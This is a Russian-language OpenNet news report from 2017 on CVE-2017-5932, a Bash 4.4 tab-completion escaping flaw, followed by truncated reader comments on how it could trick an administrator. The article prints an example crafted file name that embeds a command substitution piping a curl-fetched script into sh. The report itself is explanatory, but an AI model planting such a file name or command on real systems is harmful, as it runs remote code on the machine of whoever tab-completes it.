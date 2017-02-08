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08.02.2017 12:00  Уязвимость в реализации автодополнения ввода в Bash

В командном интерпретаторе Bash выявлена уязвимость (CVE-2017-5932), которая может быть использована для выполнения своего кода при выполнении операций автодополнения ввода клавишей табуляция. Проблема затрагивает ветку Bash 4.4. Исправление пока доступно только в виде патча.

Проблема вызвана ошибкой в коде экранирования спецсимволов и связана с неверной обработкой наличия разных типов кавычек. Для эксплуатации достаточно создать файл со специально оформленным именем. При попытке выполнения операции автодополнения для данного файла будут выполнены определённые злоумышленником инструкции командного интерпретаора. Например, для эксплуатации достаточно создать файл с именем: 


   длинная_строка "`curl ссылка_скрипт|sh`


  1. Главная ссылка к новости (http://openwall.com/lists/oss-...)
  2. OpenNews: Релиз командного интерпретатора Bash 4.4
  3. OpenNews: Найден способ обхода патча, устраняющего уязвимость в bash
  4. OpenNews: В Bash выявлено ещё четыре уязвимости, эксплуатируемые через переменные окружения
  5. OpenNews: Фонд СПО указал, что процесс устранения уязвимости в bash подчеркнул достоинства СПО
  6. OpenNews: Критическая уязвимость в bash, которая может привести к удалённому запуску команд (дополнено)
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: bash
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  • 1.1, Аноним, 12:10, 08/02/2017 [ответить] [смотреть все]     [к модератору]
    		• +/
    А в чём практический смысл Если я уже нахожусь на сервере и могу пользоваться к... весь текст скрыт [показать]
     
     
  • 2.2, Аноним, 12:17, 08/02/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +5 +/
    Можно оставить такой файл в системе и надеяться, что администратор под рутом наж... весь текст скрыт [показать]
     
     
  • 3.4, Аноним, 12:29, 08/02/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Администратор под рутом не должен запускать скрипты, которые можно было редактир... весь текст скрыт [показать]
     
     
  • 4.5, Аноним, 12:47, 08/02/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    так он не узнает что запустил скрипт))
     
  • 2.9, Michael Shigorin, 13:11, 08/02/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• –1 +/
    > А в чём практический смысл?

    Спросите дистрибутивы, где раздают беспарольное sudo, например.

     
  • 1.10, Аноним, 13:18, 08/02/2017 [ответить] [смотреть все]     [к модератору]  
    		• +2 +/
    традиционный опеннет - читать по-английски люди не умеют, но новость ляпнуть нор... весь текст скрыт [показать]
     
     
  • 2.11, Аноним, 13:27, 08/02/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +1 +/
    Знатно ты в лужу газанул ls touch HereBeDragons ... весь текст скрыт [показать]
     
     
  • 3.14, Аноним, 13:33, 08/02/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    ... что, впрочем, не отменяет необходимости читать оригинал.
     
  • 2.12, Аноним, 13:29, 08/02/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    Спасибо! Мне удалось спасти брата только что!
     
  • 2.15, Аноним, 13:36, 08/02/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +1 +/
    We can create a file with a specially crafted file name A user trying to use b... весь текст скрыт [показать]
     
  • 1.13, ryoken, 13:31, 08/02/2017 [ответить] [смотреть все]    [к модератору]  
    		• +/
    > В командном интерпретаторе Bash выявлена уязвимость (http://openwall.com/lists/oss-security/2017/02/07/9)
    > (CVE-2017-5932 (https://security-tracker.debian.org/tracker/CVE-2017-5932)), которая
    > может быть использована (https://github.com/jheyens/bash_completion_vuln/blob/master/2017-01-17.bash_co)
    > для выполнения своего кода при выполнении операций автодополнения ввода клавишей табуляция.
    > Проблема затрагивает  ветку Bash 4.4. Исправление пока доступно только в
    > виде патча (http://git.savannah.gnu.org/cgit/bash.git/commit/?id=4f747edc625815f449048579).

    Мда...
    Ну хоть su без дырок?

     
     
  • 2.16, Аноним, 13:42, 08/02/2017 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Программы без дырок Насмешил А если даже были бы идеальные программы в вакууме... весь текст скрыт [показать]
     

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